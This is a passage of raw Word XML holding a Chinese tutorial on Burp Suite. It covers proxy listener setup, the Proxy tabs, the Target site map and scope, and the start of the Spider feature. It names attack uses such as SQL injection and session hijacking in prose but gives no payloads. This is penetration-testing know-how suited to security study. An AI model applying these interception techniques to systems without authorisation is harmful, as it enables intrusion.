    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2437E071" wp14:editId="0EAA2047">
            <wp:extent cx="5274310" cy="3210450"/>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274310" cy="3210450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.4.2 Burpsuite配置代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>options中添加proxy listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA4F360" wp14:editId="66196A76">
            <wp:extent cx="5334000" cy="3599815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="16" name="图片 4" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\`F@@64F05BS$)S9CMI7{%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227891138\Image\C2C\`F@@64F05BS$)S9CMI7{%WG.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId152" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353668" cy="3613089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc499884689"/>
      <w:r w:rsidRPr="00A603D8">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>roxy工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Burp Proxy相当于BurpSuite的心脏，可以拦截，查看和修改浏览器与目标Web服务器请求和响应消息，支持http和https。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过恶意的方式修改浏览器的请求，Burp代理可以用来进行攻击，如：SQL 注入，cookie 欺骗，会话劫持，目录遍历，缓冲区溢出。拦截的传输可以被修改成原始文本，也可以是包含参数或者消息头的表格，也可以十六进制形式，甚至可以操纵二进制形式的数据。除了每一个请求，Burp 代理保持着一个完整的历史记录，包括浏览器发送的每一个请求，所有的操作，以及接收到的所有响应。你可以复查较早的请求，并修改后补发任何请求，还能以原始的形式或者 web 页面的形式来查看保存的响应。可以把两个方向上的整个会话记录到一个文件中，用来作进一步分析或者提供审查线索。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>roxy包含四个4个选项卡，intercept、http history、websockets history和options。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntercept用于拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP请求和响应。当你编辑信息之后，单击forward发送信息到服务器或浏览器，当你不想要发送这次信息可以点击drop放弃这个拦截信息，单击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intercept is off/on可以切换关闭/开启拦截，单击action按钮可以拦截选择之后的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781620BB" wp14:editId="03F2AD68">
            <wp:extent cx="5267325" cy="3648075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="53" name="图片 53" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\1%_UWN(N0GRDNX0J08C]Q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cuments\Tencent Files\2227891138\Image\C2C\1%_UWN(N0GRDNX0J08C]QQX.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId153"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4D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Http history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Http history选项卡里可以看到http请求的历史，数据总在更新，即使拦截关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="2F2F2F"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF331D8" wp14:editId="7FCBF4BF">
            <wp:extent cx="5274310" cy="1521196"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="17" name="图片 193" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\1(NN[E}I4_%95_W[AZ(Z6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Documents\Tencent Files\2227891138\Image\C2C\1(NN[E}I4_%95_W[AZ(Z6SA.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId154" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1521196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ebsockets history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ebsockets history能够看到websockets的请求，功能和http history一</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设置代理监听、请求和响应，拦截反应，匹配和替换，ssl等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_Toc499884690"/>
      <w:r w:rsidRPr="00A603D8">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>arget功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target分为site map和scope两个选项卡。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>他能帮助渗透测试人员更好地了解目标应用的整体状况、当前的工作涉及哪些目标域、分析可能存在的攻击面等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ite map</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220" w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ite map汇聚了所有 Burp 收集的关于你正在攻击的应用程序的信息。这包括了直接通过 Proxy 的请求，以及根据这些请求得到的响应的分析结果，和 Spider发现的所有内容。当你浏览一个应用程序时，会为你映射出大量的内容，甚至远远超过你的要求。例如：已请求的项目会以黑色显示；那些也被 Burp 推断出，但还未被请求过的以灰色显示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E7935F4" wp14:editId="1B17A124">
            <wp:extent cx="5295533" cy="4371975"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="18" name="图片 18" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\TIE(Q0F)RY1C2GH6DBH~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ocuments\Tencent Files\2227891138\Image\C2C\TIE(Q0F)RY1C2GH6DBH~W@O.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId155" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5302356" cy="4377608"/>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SiteMap会在目标中以树形和表形式显示，并且还可以查看完整的请求和响应。树视图包含内容的分层表示，随着细分为地址，目录，文件和参数化请求的URL 。该表视图显示有关每个项目（URL ， HTTP状态代码，网页标题等）的关键细节。您可以根据任意列进行排序表（单击列标题来循环升序排序，降序排序，和未排序） 。如果您在表中选择一个项目，请求和响应（如适用）该项目显示在请求/响应窗格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这个主要是配合Site map做一些过滤的功能，scope设置，可以在Target SiteMap和Proxy history上右击url “add to scope”添加，也可以自己手动添加。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748DB133" wp14:editId="7AD3EA89">
            <wp:extent cx="5429250" cy="4385163"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="图片 76" descr="D:\Documents\Tencent Files\2227891138\Image\C2C\Y$BQ([AA(@51V(0FS9GP1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Tencent Files\2227891138\Image\C2C\Y$BQ([AA(@51V(0FS9GP1LD.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId156" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5429250" cy="4385163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="2F2F2F"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc499884691"/>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spider功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Spider是一个自动获取 web 应用的工具。它使用多种智能技术来获取应用的内容和功能。 spider通过跟踪 HTML 和 JavaScript 以及提交的表单中的超链接来映射目标应用程序，它还使用了一些其他的线索，如目录列表，资源类型的注释，以及 robots.txt 文件。 结果会在站点地图中以树和表的形式显示出来，提供了一个清楚并非常详细的目标应用视图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00996022" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996022">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在http history选项中选中一个请求，然后右击，在快捷菜单中选中spider from here进行爬取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D4162" w:rsidRPr="00A603D8" w:rsidRDefault="004D4162" w:rsidP="004D4162">
      <w:pPr>
        <w:ind w:right="220"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A603D8">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
